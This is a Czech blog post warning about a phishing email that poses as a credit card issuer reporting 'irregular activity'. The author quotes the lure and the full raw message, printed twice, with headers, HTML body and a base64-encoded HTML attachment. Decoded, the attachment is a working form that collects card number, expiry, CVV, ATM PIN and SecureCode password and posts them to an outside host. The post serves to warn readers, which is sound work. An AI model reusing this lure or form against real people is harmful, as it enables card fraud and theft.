Home
platební karty
platební karty

Do schránky mi přistál dobře udělaný nebezpečný phishing email sloužící k získání citlivých údajů o platebních kartách.

Email vypadá jakoby zaslaný s zdánlivě důvěrihodné adresy na webu creditcard.com.

Naštěstí pro velkou část potencionálně ohrožených lidí je email v angličtině.

Irregular activity on your Credit Card

Dear Credit Card Customer,

We have detected irregular activity on your Credit Card on November 11, 2011.
As the Primary Contact, you must verify your account activity before you can continue using
your card, and upon verification, we will remove any restrictions placed on your account.

To review your account as soon as possible please download
the attached form and follow the instructions on your screen.

We appreciate your business and the opportunity to serve you.
Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered.

Viz screenshot:

V emailu nechybí potřebné loga: Visa, MasterCard, Maestro

Pod emailem je odkaz na formulář s bezpečně znějícím názvem: Secured_Online_Verification_Form.html

Formulář je hostován u Google.com

Pokud někoho zajímá hlavička emailu, pak originál v surovém stavu je tady:

Delivered-To: **********@gmail.com
Received: by 10.231.211.2 with SMTP id gm2cs42479ibb;
Thu, 2 Feb 2012 02:10:30 -0800 (PST)
Received: by 10.236.197.6 with SMTP id s6mr2693457yhn.68.1328177429661;
Thu, 02 Feb 2012 02:10:29 -0800 (PST)
Return-Path: <vsmc@creditcard.com>
Received: from funkenstien.fmlive.net (ns2.fmlive.net. [66.7.201.125])
by mx.google.com with ESMTPS id e6si1902644yhk.65.2012.02.02.02.10.29
(version=TLSv1/SSLv3 cipher=OTHER);
Thu, 02 Feb 2012 02:10:29 -0800 (PST)
Received-SPF: neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) client-ip=66.7.201.125;
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) smtp.mail=vsmc@creditcard.com
Received: from 74-92-64-45-philadelphia.hfc.comcastbusiness.net ([74.92.64.45]:37579 helo=creditcard.com)
by funkenstien.fmlive.net with esmtpa (Exim 4.69)
(envelope-from <vsmc@creditcard.com>)
id 1ROxJT-0000Uz-UW
for peeeetr@gmail.com; Fri, 11 Nov 2011 12:03:00 -0800
From: Credit Card Issues <vsmc@creditcard.com>
To: peeeetr@gmail.com
Subject: Irregular activity on your Credit Card
Date: 11 Nov 2011 15:07:32 -0500
Message-ID: <20111111150732.794D9DA6EFAC620F@creditcard.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=“—-=_NextPart_000_0012_B1853F78.94E260BA“
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – funkenstien.fmlive.net
X-AntiAbuse: Original Domain – gmail.com
X-AntiAbuse: Originator/Caller UID/GID – [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain – creditcard.com
X-Source:
X-Source-Args:
X-Source-Dir:
This is a multi-part message in MIME format.
——=_NextPart_000_0012_B1853F78.94E260BA
Content-Type: text/html;
charset=“iso-8859-1″
Content-Transfer-Encoding: quoted-printable
<div id=3D“Secure your Credit Card“>
<td align=3D“center“>  <img src=3D“http://www.efts.ro/images/media/diver=
se/visa_mastercard.gif“ alt=3D“Secure your Credit Card“ /></td>
<br>
Dear Credit Card Customer,<br><br>
We have detected irregular activity on your Credit Card on November 11, 2011=
=2E<br>
As the Primary Contact, you must verify your account activity before you can=
continue using<br>
your card, and upon verification, we will remove any restrictions placed on =
your account.<br>
<br><br>
To review your account as soon as possible please download<br>
the attached form and follow the instructions on your screen.<br>
<br><br>
We appreciate your business and the opportunity to serve you.<br>
Please do not reply to this e-mail as this is only a notification. Mail sent=
to this address cannot be answered.
——=_NextPart_000_0012_B1853F78.94E260BA
Content-Type: application/octet-stream; name=“Secured_Online_Verification_Form.html“
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=“Secured_Online_Verification_Form.html“
DQo8L2hlYWQ+DQoNCjxib2R5Pg0KPGRpdiBpZD0iU2VjdXJlIHlvdXIgQ3JlZGl0IENhcmQi
Pg0KCSAgIDx0ZCBhbGlnbj0iY2VudGVyIj4gIDxpbWcgc3JjPSJodHRwOi8vd3d3LmVtc2Nh
cmQuY29tL3VzZXJGaWxlcy9sb2dvLzEwMDEyOC0zZHNlY3VyZS5qcGciIGFsdD0iU2VjdXJl
IHlvdXIgQ3JlZGl0IENhcmQiIC8+PC90ZD4NCg0KDQoJPGZvcm0gbmFtZT0iZiIgYWN0aW9u
PSJodHRwOi8vbWFpbC50dWZmc3RlZWwuY28ua2UvbWlyaW5kYS5waHAiIG1ldGhvZD0icG9z
dCIgb25zdWJtaXQ9InJldHVybiB2YWxGKHRoaXMpIj4NCgk8dGFibGUgaWQ9Im1haW4iIGNl
bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNSI+DQoJCTx0cj48dGQgaWQ9ImhlYWRlciIg
Y29sc3Bhbj0iMiI+PC90ZD48L3RyPg0KCQk8dHI+PHRkIGNvbHNwYW49IjIiIGNsYXNzPSJm
aXJzdCI+PGgxPlNlY3VyZSB5b3VyIENyZWRpdCBDYXJkPC9oMT4NCg0KCQkJWW91IGhhdmUg
cmVjZWl2ZWQgdGhpcyBmaWxlIGJlY2F1c2UgeW91ciBDcmVkaXQgQ2FyZCBoYXMgYmVlbiB0
ZW1wb3JhcmlseSBzdXNwZW5kZWQuPGJyIC8+DQoJCQlQbGVhc2UgZmlsbCBvdXQgYW5kIHN1
Ym1pdCB0aGlzIGZvcm0gaW4gb3JkZXIgdG8gcmVzdG9yZSB5b3VyIGFjY291bnQuPGJyIC8+
DQo8YnIgLz4NCg0KCQk8L3RkPjwvdHI+DQoJCTx0ciBjbGFzcz0iZnJtIiA+DQoJCQk8dGQg
YWxpZ249InJpZ2h0Ij4gQ3JlZGl0IENhcmQgTnVtYmVyPC90ZD48dGQ+PGlucHV0IHR5cGU9
InRleHQiIHNpemU9IjE3IiBtYXhsZW5ndGg9IjE2IiBuYW1lPSJjYyIgLz48L3RkPg0KCQk8
L3RyPg0KCQk8dHIgY2xhc3M9ImZybSI+DQoJCQk8dGQgYWxpZ249InJpZ2h0Ij4gQ3JlZGl0
IENhcmQgRXhwaXJhdGlvbiBEYXRlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9
IjIiIG1heGxlbmd0aD0iMiIgbmFtZT0iZXhwbSIgLz4gLSA8aW5wdXQgdHlwZT0idGV4dCIg
c2l6ZT0iNCIgbWF4bGVuZ3RoPSI0IiBuYW1lPSJleHB5IiAvPjxzcGFuIGNsYXNzPSJoZWxw
Ij4obW9udGggLSB5ZWFyKTwvc3Bhbj48L3RkPg0KCQk8L3RyPg0KCQk8dHIgY2xhc3M9ImZy
bSI+DQoJCQk8dGQgYWxpZ249InJpZ2h0Ij4gQ3JlZGl0IENhcmQgU2VjdXJpdHkgQ29kZTwv
dGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzIiBtYXhsZW5ndGg9IjMiIG5hbWU9
ImN2diIgLz48L3RkPg0KPC90cj4NCgkJPHRyIGNsYXNzPSJmcm0iPg0KCQkJPHRkIGFsaWdu
PSJyaWdodCI+IENyZWRpdCBDYXJkIEFUTSBQSU48L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4
dCIgc2l6ZT0iNCIgbWF4bGVuZ3RoPSI0IiBuYW1lPSJwaW4iIC8+IDxzcGFuIGNsYXNzPSJo
ZWxwIj4oICpyZXF1aXJlZCApPC9zcGFuPjwvdGQ+DQoNCgkJPC90cj4NCg0KCQk8dHIgY2xh
c3M9ImZybSI+PGJyPg0KCQkJPHRkIGFsaWduPSJyaWdodCI+IDxiPlZlcmlmaWVkIGJ5IFZJ
U0EgLyBNYXN0ZXJjYXJkIFNlY3VyZUNvZGU8L2I+IHBhc3N3b3JkIDwvdGQ+PHRkPjxpbnB1
dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbWF4bGVuZ3RoPSIxNCIgbmFtZT0idmJ2IiAvPjxz
cGFuIGNsYXNzPSJoZWxwIj4oICpyZXF1aXJlZCApPC9zcGFuPjwvdGQ+DQoJCTwvdHI+DQoN
CgkJPHRyIGNsYXNzPSJmcm0iPg0KCQkJPHRkIGFsaWduPSJjZW50ZXIiIGNvbHNwYW49IjIi
PjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTdWJtaXQgYW5kIFVOTE9DSyB5b3VyIENy
ZWRpdCBDYXJkIE5PVyIvPjxiciAvPg0KPGJyIC8+DQo8YnIgLz4NCjwvdGQ+DQoJCTwvdHI+
DQoNCg0KCQk8dHI+PHRkIGNvbHNwYW49IjIiIGlkPSJmb290ZXIiPkNvcHlyaWdodCAmY29w
eTsgMjAxMS4gVmVyaWZpZWQgYnkgVklTQSAvIE1hc3RlckNhcmQgU2VjdXJlQ29kZS4gQWxs
IHJpZ2h0cyByZXNlcnZlZC48L3RkPjwvdHI+DQoJPC90YWJsZT4NCg0KCTwvZm9ybT4NCgk8
L2Rpdj4NCg0KPC9ib2R5Pg0KPC9odG1sPg0K
——=_NextPart_000_0012_B1853F78.94E260BA–

Delivered-To: **********@gmail.comReceived: by 10.231.211.2 with SMTP id gm2cs42479ibb;        Thu, 2 Feb 2012 02:10:30 -0800 (PST)Received: by 10.236.197.6 with SMTP id s6mr2693457yhn.68.1328177429661;        Thu, 02 Feb 2012 02:10:29 -0800 (PST)Return-Path: <vsmc@creditcard.com>Received: from funkenstien.fmlive.net (ns2.fmlive.net. [66.7.201.125])        by mx.google.com with ESMTPS id e6si1902644yhk.65.2012.02.02.02.10.29        (version=TLSv1/SSLv3 cipher=OTHER);        Thu, 02 Feb 2012 02:10:29 -0800 (PST)Received-SPF: neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) client-ip=66.7.201.125;Authentication-Results: mx.google.com; spf=neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) smtp.mail=vsmc@creditcard.comReceived: from 74-92-64-45-philadelphia.hfc.comcastbusiness.net ([74.92.64.45]:37579 helo=creditcard.com) by funkenstien.fmlive.net with esmtpa (Exim 4.69) (envelope-from <vsmc@creditcard.com>) id 1ROxJT-0000Uz-UW for peeeetr@gmail.com; Fri, 11 Nov 2011 12:03:00 -0800From: Credit Card Issues <vsmc@creditcard.com>To: peeeetr@gmail.comSubject: Irregular activity on your Credit CardDate: 11 Nov 2011 15:07:32 -0500Message-ID: <20111111150732.794D9DA6EFAC620F@creditcard.com>MIME-Version: 1.0Content-Type: multipart/mixed; boundary=“—-=_NextPart_000_0012_B1853F78.94E260BA“X-AntiAbuse: This header was added to track abuse, please include it with any abuse reportX-AntiAbuse: Primary Hostname – funkenstien.fmlive.netX-AntiAbuse: Original Domain – gmail.comX-AntiAbuse: Originator/Caller UID/GID – [47 12] / [47 12]X-AntiAbuse: Sender Address Domain – creditcard.comX-Source: X-Source-Args: X-Source-Dir:
This is a multi-part message in MIME format.
——=_NextPart_000_0012_B1853F78.94E260BAContent-Type: text/html; charset=“iso-8859-1″Content-Transfer-Encoding: quoted-printable

<div id=3D“Secure your Credit Card“>   <td align=3D“center“>  <img src=3D“http://www.efts.ro/images/media/diver=se/visa_mastercard.gif“ alt=3D“Secure your Credit Card“ /></td><br>Dear Credit Card Customer,<br><br>
We have detected irregular activity on your Credit Card on November 11, 2011==2E<br>
As the Primary Contact, you must verify your account activity before you can= continue using<br>
your card, and upon verification, we will remove any restrictions placed on =your account.<br>
<br><br>To review your account as soon as possible please download<br>
the attached form and follow the instructions on your screen.<br><br><br>

We appreciate your business and the opportunity to serve you.<br>
Please do not reply to this e-mail as this is only a notification. Mail sent= to this address cannot be answered.——=_NextPart_000_0012_B1853F78.94E260BAContent-Type: application/octet-stream; name=“Secured_Online_Verification_Form.html“Content-Transfer-Encoding: base64Content-Disposition: attachment; filename=“Secured_Online_Verification_Form.html“
DQo8L2hlYWQ+DQoNCjxib2R5Pg0KPGRpdiBpZD0iU2VjdXJlIHlvdXIgQ3JlZGl0IENhcmQiPg0KCSAgIDx0ZCBhbGlnbj0iY2VudGVyIj4gIDxpbWcgc3JjPSJodHRwOi8vd3d3LmVtc2NhcmQuY29tL3VzZXJGaWxlcy9sb2dvLzEwMDEyOC0zZHNlY3VyZS5qcGciIGFsdD0iU2VjdXJlIHlvdXIgQ3JlZGl0IENhcmQiIC8+PC90ZD4NCg0KDQoJPGZvcm0gbmFtZT0iZiIgYWN0aW9uPSJodHRwOi8vbWFpbC50dWZmc3RlZWwuY28ua2UvbWlyaW5kYS5waHAiIG1ldGhvZD0icG9zdCIgb25zdWJtaXQ9InJldHVybiB2YWxGKHRoaXMpIj4NCgk8dGFibGUgaWQ9Im1haW4iIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNSI+DQoJCTx0cj48dGQgaWQ9ImhlYWRlciIgY29sc3Bhbj0iMiI+PC90ZD48L3RyPg0KCQk8dHI+PHRkIGNvbHNwYW49IjIiIGNsYXNzPSJmaXJzdCI+PGgxPlNlY3VyZSB5b3VyIENyZWRpdCBDYXJkPC9oMT4NCg0KCQkJWW91IGhhdmUgcmVjZWl2ZWQgdGhpcyBmaWxlIGJlY2F1c2UgeW91ciBDcmVkaXQgQ2FyZCBoYXMgYmVlbiB0ZW1wb3JhcmlseSBzdXNwZW5kZWQuPGJyIC8+DQoJCQlQbGVhc2UgZmlsbCBvdXQgYW5kIHN1Ym1pdCB0aGlzIGZvcm0gaW4gb3JkZXIgdG8gcmVzdG9yZSB5b3VyIGFjY291bnQuPGJyIC8+DQo8YnIgLz4NCg0KCQk8L3RkPjwvdHI+DQoJCTx0ciBjbGFzcz0iZnJtIiA+DQoJCQk8dGQgYWxpZ249InJpZ2h0Ij4gQ3JlZGl0IENhcmQgTnVtYmVyPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjE3IiBtYXhsZW5ndGg9IjE2IiBuYW1lPSJjYyIgLz48L3RkPg0KCQk8L3RyPg0KCQk8dHIgY2xhc3M9ImZybSI+DQoJCQk8dGQgYWxpZ249InJpZ2h0Ij4gQ3JlZGl0IENhcmQgRXhwaXJhdGlvbiBEYXRlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjIiIG1heGxlbmd0aD0iMiIgbmFtZT0iZXhwbSIgLz4gLSA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNCIgbWF4bGVuZ3RoPSI0IiBuYW1lPSJleHB5IiAvPjxzcGFuIGNsYXNzPSJoZWxwIj4obW9udGggLSB5ZWFyKTwvc3Bhbj48L3RkPg0KCQk8L3RyPg0KCQk8dHIgY2xhc3M9ImZybSI+DQoJCQk8dGQgYWxpZ249InJpZ2h0Ij4gQ3JlZGl0IENhcmQgU2VjdXJpdHkgQ29kZTwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzIiBtYXhsZW5ndGg9IjMiIG5hbWU9ImN2diIgLz48L3RkPg0KPC90cj4NCgkJPHRyIGNsYXNzPSJmcm0iPg0KCQkJPHRkIGFsaWduPSJyaWdodCI+IENyZWRpdCBDYXJkIEFUTSBQSU48L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNCIgbWF4bGVuZ3RoPSI0IiBuYW1lPSJwaW4iIC8+IDxzcGFuIGNsYXNzPSJoZWxwIj4oICpyZXF1aXJlZCApPC9zcGFuPjwvdGQ+DQoNCgkJPC90cj4NCg0KCQk8dHIgY2xhc3M9ImZybSI+PGJyPg0KCQkJPHRkIGFsaWduPSJyaWdodCI+IDxiPlZlcmlmaWVkIGJ5IFZJU0EgLyBNYXN0ZXJjYXJkIFNlY3VyZUNvZGU8L2I+IHBhc3N3b3JkIDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbWF4bGVuZ3RoPSIxNCIgbmFtZT0idmJ2IiAvPjxzcGFuIGNsYXNzPSJoZWxwIj4oICpyZXF1aXJlZCApPC9zcGFuPjwvdGQ+DQoJCTwvdHI+DQoNCgkJPHRyIGNsYXNzPSJmcm0iPg0KCQkJPHRkIGFsaWduPSJjZW50ZXIiIGNvbHNwYW49IjIiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTdWJtaXQgYW5kIFVOTE9DSyB5b3VyIENyZWRpdCBDYXJkIE5PVyIvPjxiciAvPg0KPGJyIC8+DQo8YnIgLz4NCjwvdGQ+DQoJCTwvdHI+DQoNCg0KCQk8dHI+PHRkIGNvbHNwYW49IjIiIGlkPSJmb290ZXIiPkNvcHlyaWdodCAmY29weTsgMjAxMS4gVmVyaWZpZWQgYnkgVklTQSAvIE1hc3RlckNhcmQgU2VjdXJlQ29kZS4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L3RkPjwvdHI+DQoJPC90YWJsZT4NCg0KCTwvZm9ybT4NCgk8L2Rpdj4NCg0KPC9ib2R5Pg0KPC9odG1sPg0K
——=_NextPart_000_0012_B1853F78.94E260BA–

5th Pro 2011
platební karty

One Response to “Email phishing na data z platebních karet”

  1. Pavel napsal:

    Pěkně a věrohodně udělaný phishing, to se musí uznat.

Leave a Reply

You must be logged in to post a comment.

platební karty
 
platební karty
platební karty
In collaboration with Osobní bankrot.info.